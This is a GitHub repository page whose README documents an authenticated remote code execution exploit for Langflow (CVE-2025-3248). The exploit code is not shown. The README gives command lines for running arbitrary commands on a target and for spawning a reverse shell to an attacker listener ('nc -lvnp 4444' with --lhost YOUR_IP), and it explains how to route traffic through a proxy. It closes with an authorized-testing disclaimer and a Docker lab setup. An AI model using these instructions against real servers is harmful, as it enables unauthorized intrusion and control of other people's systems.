Skip to content

tiemio/RCE-CVE-2025-3248

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Authenticated CVE-2025-3248 Langflow Remote Code Execution

This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.


Features

  • Authenticated Command Execution: Run arbitrary system commands on the target.
  • Reverse Shell: Spawn a reverse shell to your listener.
  • Proxy Support: Route requests through a proxy (e.g., Burp Suite).

Requirements

  • Python 3.x
  • requests library

Install dependencies with:

pip install requests

Usage

python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Arguments

Argument Description Required
-u, --url Target base URL (e.g., https://target.com) Yes
-l, --login Admin username Yes
-p, --password Admin password Yes
-c, --command Command to execute on the target No*
--proxy Proxy URL (e.g., http://127.0.0.1:8080) No
--lhost Local host for reverse shell No*
--lport Local port for reverse shell No*

* You must specify either a command (-c) or both --lhost and --lport for a reverse shell.


Examples

1. Execute a Command

python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Get a Reverse Shell

Start a listener on your machine:

nc -lvnp 4444

Then run:

python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Use a Proxy

python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Docker image

Deploying the image

You can deploy the Docker image using the following command:

podman compose up -d

The image will be available at http://localhost:7860. Credits for the compose file: This repository


Disclaimer

This script is for educational and authorized penetration testing purposes only. Do not use against systems you do not own or have explicit permission to test.


This readme is AI generated.

About

This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages